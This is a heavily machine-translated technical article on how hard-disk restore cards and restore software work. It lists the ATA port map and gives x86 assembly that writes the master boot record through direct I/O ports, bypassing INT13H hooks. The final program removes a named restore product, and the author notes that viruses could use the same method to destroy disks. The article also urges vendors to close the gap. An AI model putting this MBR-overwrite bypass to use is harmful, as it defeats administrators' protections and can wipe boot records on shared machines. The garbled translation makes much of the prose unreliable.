The restore card and restore software are widely used in a variety of public applications, such as school rooms and Internet cafes. These restore cards and restore software (hereinafter referred to as virtual restore technology) can record everything to write to the hard disk, whether you copy the hard drive or mobile deletion or even formatting partitions, as long as you restart, everything will be restored Before this operation, some virtual restore manufacturers will also add a "to prevent all computer viruses" in advertising words. This virtual restore method can indeed play a good protection of the computer room in public computer room. Is there a way to penetrate this protection? The answer is negative, please listen to me one by one below.
First, the principle of virtual restoration technology
As mentioned in this paper, it is a technique that is commonly used in restore card or restore software. Of course, different brands of different manufacturers may not be the same, but the principle is connected.
First, the restore card and restore software will take the leader to capture the guiding rights, save the original 0-head 1 fan in one other sector, (specific backup to that sector is not necessarily), write your code to 0 The head is 1 fan, so that it can be executed before the operating system, this is similar to a guiding virus; then let's take a look at what the virtual restore technology has done before the operating system:
1. Save the INT13H in the interrupt vector table;
2. Write yourself instead of INT13H code to write memory, remember the entrance address, of course, this "write memory" is not ordinary "written", but a method we call "resident", related " The implementation method of the resident program "We don't have the flower arrangement, if you don't understand, please find relevant information, you can
Www.hackart.org or
Www.lsky.net finds a fan-like man exchanged;
3. The inlet address of INT13H in the interrupt vector table is changed to the entry address of this resident program. In addition, the virtual restore program often modifies some other interrupt portions after modifying the entrance of INT13H, of course, through the resident program, which is used to implement the INT13H entrance address monitoring in the interrupt vector table, once found modified, I will change it immediately, which is also used to prevent being cracked by people.
Ok, you have seen it, this code used to replace BIOS is the key to virtual restoration technology, then this code is achieved, the following is my own understanding:
1. Intercepting all INT13H 0 head 0 to 1 fan
These include reading and writing, transforming all the operations of 0-headed 1 fan to the sector backup of the virtual restore program, which is the purpose of protecting the virtual restore code is not damaged, and cannot be read by the people Crack, even if you use the Sector Editing tool to view the main boot area, you can actually see the main boot area of this backup.
2. Intercepting write hard disk operations in all INT13H
Here, it includes a write operation in the INT13H of the hard disk of 8 g or less, and the write operation in the INT13H, and the extension INT13H is based on the sector address, and even the expansion int13h is for some non-IDEs. The write operation of the hard disk of the interface.
As for the key to interception, what is the key to virtual restore technology, it is entirely "nothing" in the early DOS system, that is, when the user is written, it is actually not done, but the current operating system is To make some necessary write operations for the hard disk, such as the write operation of the virtual memory. As we all know, virtual memory is actually hard drive, and if the operating system is prohibited, it is obviously unimaginable. Therefore, most of the virtual restore manufacturers use some hard disk space to make a record of the write operation in the hard disk, and if the system restarts, restores this record, but how to record the hard drive's write, I have never If you want to pass, this "science" should reflect the amount of time and hard disk space, that is, how to use the least amount of time and the least hard disk space to record the hard disk write operation is the key, if there is Our friends are welcome to communicate with me; 3. The contents of the backup ports 70h, 71h, and compare the contents of the port 70h, 71h, 71h, and the contents of the backup of the backup, not the same prompts, whether to restore, and via the password to modify whether the BIOS is legal.
Second, the interrupt mechanism of the PC
The interrupt provides the most basic hardware and software interface, which makes the programmer do not have to know the details of the hardware system, as long as the system is directly called, the corresponding function can be completed, so that the programming is more convenient. Its implementation mechanism is as follows: When a disrupt source issues an interrupt request, the CPU can decide whether to respond to this interrupt request (when the CPU is performing more important work, it can be no response), if allowed to be interrupted, the CPU will be interrupted After execution of the current instruction, the state of the next instruction address and the contents of each register and the status of the registers are put into the stack, and then go to the entrance to the interrupt source service program, interrupt processing, when interrupt After the processing is completed, restore the reserved registers, flag bit status, and instruction pointers to return the CPU to the breakpoint and continue the next instruction.
In order to distinguish all interrupts, the CPC system assigns an interrupt number N to each interrupt, such as INT 3H is a breakpoint interrupt, INT 10h is an interrupt, and we have to discuss today is the main INT 13H disk read and write interrupt.
To say clearly, the interrupt mechanism on the PC is completely insufficient. Here I am talking about it. If you don't know, please check some information or communicate with me, what we are important today is INT13H Take a picture to see what BIOS is available to us. What is it doing? The so-called BIOS interrupt is simple to say is the interrupt provided by the BIOS on your machine, then what is it behind the BIOS? In fact, some of the input and output operations for ports, each port of the PC implements a specific function, we can do without calling the BIOS provided by the BIOS, and use the input / output command to operate these ports, so that you can implement image call BIOS interrupt The same function, but a premise is that you must have a detailed understanding of these ports. Conversely, a great advantage of the PC's interrupt system is to allow programmers to be able to program, from this point of view, interruption is a bit like "packaging" we usually say, I don't know like this. Saying right, but it is indeed an interrupted details of the underlying system of the system.
Third, the specific meaning of the hard disk read and write port
The common port for operating the hard disk is a port of 1F0H ~ 1F7H, and each port meanings is as follows:
Port number reading or writing specific meaning
1F0H read / write data used to transfer read / write data (its content is a byte of the transmitted byte)
1f1h reads to read the error
1f2h read / write to put the number of sectors to read and write 1F3H read / write to place the sector number to read and write
1F4H read / write used to store low 8-bit bytes of reading column
1F5H read / write used to store the high 2-bit bytes of readout column (height 6-position constant 0)
1F6H read / write disk number and magnetic head number to read / write
7th bit constant 1
6th bit constant 0
5th perspective 1
The 4th is 0 represents the first hard disk, which represents the second hard disk.
No. 3 ~ 0 is used to store the magnetic head number to read / write
1f7h reads the status after reading the read operation
The 7th controller is busy
The sixth disk drive is ready
5th write error
4th search completion
The third bit is 1 when the sector buffer is not ready.
Whether the second place correctly reads disk data
The first disk is set to 1 every week.
The 0th command ends due to an error
Write the bit port for the command port, used to issue a specified command
Formatted track for 50H
Try reading a sector for 20H
It is not necessary to verify that the sector is ready for the sector and directly read the sector.
Try to read the long sector for 22h (for early hard drives, each fan may not be 512 bytes, but 128 bytes to 1024)
Do not verify that the sectors are ready for the sector to read the long sector
Try a write sector for 30h
There is no need to verify that the sector is ready for 31h.
Try to write long sectors for 32h
No need to verify that the sector is ready for 33h to write long sectors
Note: Of course, after reading this table, you will find that this method of reading and writing is actually based on the hard disk reading method of the head, cylinder, and the sector. However, the reading and writing method of the hard disk greater than 8G is also through the port 1F0H ~ 1F7H. Implemented ^ _ ^
Fourth, an instance of reading and writing hard drives by inputting an output port operation of the hard disk
Let's take a look at the INT13H read and write hard disk program instance. In the example, the port used in the read / write operation of the hard disk is described in detail, and the data obtained by the main boot area read from INT13H and the data obtained by the input and output read main boot regions are compared to confirm the two operation functions. Similarly, the program fragment is as follows:
MOV DX, 1F6H; disk number and magnetic head number to be read
MOV Al, 0A0H; Disk 0, magnetic head 0
Out dx, al
MOV DX, 1F2H; number of sectors to be read
MOV Al, 1; read a sector
Out dx, al
MOV DX, 1F3H; sector number to read
MOV Al, 1; sector number 1
Out dx, al
MOV DX, 1F4H; low 8 positions to read
MOV Al, 0; Cylindrical low 8 bits 0
Out dx, al
MOV DX, 1F5H; 2 high cylindrical high
MOV Al, 0; Cylindrical high 2 bits (we can determine through 1F4H and 1F5H ports)
The column number used to read is 0)
Out dx, al
MOV DX, 1F7H; Command Port
MOV Al, 20H; try to read the sector
Out dx, al
Still_going:
IN Al, DX
Test Al, 8; Are sector buffer ready
JZ STILL_GOING; if the sector buffer is not ready, jump until it is ready.
MOV CX, 512/2; Set the number of cycles (512/2)
MOV DI, OFFSET BUFFERMOV DX, 1F0H; a byte of a byte to be transmitted
Rep INSW; transfer data
; --------
MOV AX, 201H; The following is 0 heads, 0 cylinders, 1 sector with INT13H
MOV DX, 80H
MOV CX, 1
MOV BX, Offset Buffer2
INT 13h
MOV CX, 512; The following sections are used to compare hard disk data read out from the two methods.
MOV Si, Offset Buffer
MOV DI, Offset Buffer2
REPE CMPSB
JNE Failure
MOV AH, 9
MOV DX, Offset Readmsg
Int 21h
JMP good_exit
Failure:
MOV AH, 9
MOV DX, Offset Failmsg
Int 21h
Good_exit:; The following part is used to end the program
MOV AX, 4C00H; Exit Procedure
Int 21h
Readmsg DB 'The Buffers Match. Hard Disk Read Using Ports. $'
Failmsg DB 'The Buffers Do Not Match. $'
Buffer DB 512 DUP ('V')
Buffer2 DB 512 DUP ('L')
5. You can penetrate the recovery card or the code to protect the software.
You can read the port meanings of the hard disk and look at the above examples, you will have a relatively deep understanding of the hard disk read port. Ok, when I arrived at the answer, I returned to our theme. As you think now, this code that can penetrate the restore card or the reduced software protection is indeed the input and output of the hard disk read port. Now, we can already understand it from principle, the restore card interception is an interrupt operation, but can't intercept the input output operation, and use the input output operation to write to the hard disk, of course, you can read it with the input and output operation. To the critical portion of the virtual restore program shield, 0 heads of the restore card or the reduced software shielded. After knowing this principle, it may be that the benevolent sees the benevolence, if you are a virtual restore technology crack, a viral manufacturer, or designer of virtual restore technology, often understanding this understanding of.
Here, I emphasized that I didn't agree to make a virus, but a virus manufacturer can use this principle to write a machine that can achieve the destruction of the restore card or restore software, so I want to remind the virtual restore user, don't think it is The restore card or the restore software will drop lightly. To know the protection of the virus in the world to penetrate the virtual restoration technology, to achieve the purpose of destroying the hard disk, imagine if this principle is applied to CIH virus, or use to hard disk killer In the virus, the consequences are unbearable.
Talk about how to use this code that can penetrate the virtual restore technology to crack the restore software (such as the restored elf). The following is the code I wrote to test the cracking of the elves. The code compiled by this code needs to be executed in the pure DOS environment. I use this code to successfully uninstall this code.
.286
Code segment
Assume CS: Code, DS: Code, ES: CODE
Start:
; ------------------------------------------------- ---------
; The following code uses the INT13H read main guidance area
MOV AX, 0201H
MOV DX, 0080HMOV CX, 0001H
MOV BX, 7C00H
INT 13h
; ------------------------------------------------- ------------
The following code uses I / O port to write the main guidance area
MOV DX, 1F6H; disk number and magnetic head number to be read
MOV Al, 0A0H; Disk 0, magnetic head 0
Out dx, al
MOV DX, 1F2H; the number of sectors to be written
MOV Al, 1; write a sector
Out dx, al
MOV DX, 1F3H; the sector number to be written
MOV Al, 1; write 1 sector
Out dx, al
MOV DX, 1F4H; low 8 positions to write
MOV Al, 0; low 8 digits 0
Out dx, al
MOV DX, 1F5H; 2 high 2 points to write
MOV Al, 0; high 2 bits 0
Out dx, al
MOV DX, 1F7H; Command Port
MOV Al, 30H; Try a write sector.
Out dx, al
OOGLE:
IN Al, DX
TEST Al, 8; Whether the disk sector buffer is ready
JZ Oogle
MOV CX, 512/2; Set the number of cycles (512/2)
MOV Si, 7C00H
MOV DX, 1F0H; Data ports, used to store data to be sent.
Rep Outsw; send data.
; ------------------------------------------------- -----------------------------
;exit the program
MOV AH, 4CH
Int 21
Code ends
End Start
The above procedure is very simple, explained as follows:
1, first read the original main guidance area of the restored elf with INT13H, although it is a read operation of 0 heads 0, but in fact, it is actually reading the original main guidance area backup. That sector;
2. Write the original main guidance zone into the real main guidance area through the input and output operation. In other words, it is to completely delete the restore the elves, and then restart you will find that the restore wizard has not been.
I wrote a program for uninstalling the effort such as ForWin98 / NT / XP, everyone can
Www.lsky.net download, but someone is a step by step, that is, a clear MBR program of the Internet cafes, I tried it, I found it, I haven't carefully analyze the procedure, but I dare to affirm it. The principle is similar. That program is well written, but I think there is something to improve. My hard disk MBR program is written by I have, used to implement multiple boot operations, when I execute the MBR program, my multi-boot code is not If I think this program can change the core code part into the code like me. Under the restoration of the Elf, the MBR before the reduction of the wizard returned to the main guidance area, even if the hard disk that did not load the elves was just the main The guidance area is written back to the main guidance area, there is no danger.
It is possible to achieve the crack of the restore card with the above method, because the restore card is hardware after all, it can execute before the hard disk is booted, so that even if you write back the hard drive's main guidance area, the restore card can still write it Back, however, when cracking the restore card, you can use the principle in the article, write the restore card to the true code reading of the hard disk main boot area, and even some restore cards passwords in this sector. For the manufacturer of restore cards and restore software, how to make your own restore card or restore software safer, it may be a problem that needs to be thought. I sincerely hope that the restore card or the restore software can block the hard disk I / O operation while intercepting the INT13H.
When I installed the restore wizard, I saw an option was "Prevent Hard Disk I / O Destruction", and I thought I thought that the elves did in this regard, I thought of the protection of the hard disk from intercepting I / O operations. Unfortunately, I am wrong, even if I choose this option, I can also write the hard drive by entering the output port operation. For those who have mastered this technique, this restore card or the restore software can be said to be in shape. So I think that the restore card and restore software must not only intercept all hard disk write operations, intercept the read and write operations of the main boot area, but should intercept the operation of the hard disk read and write, only such virtual restore technology can make Based on The hard disk's read and write port operation is destroyed by the hard disk or the crack of the virtual restore technology is not possible.
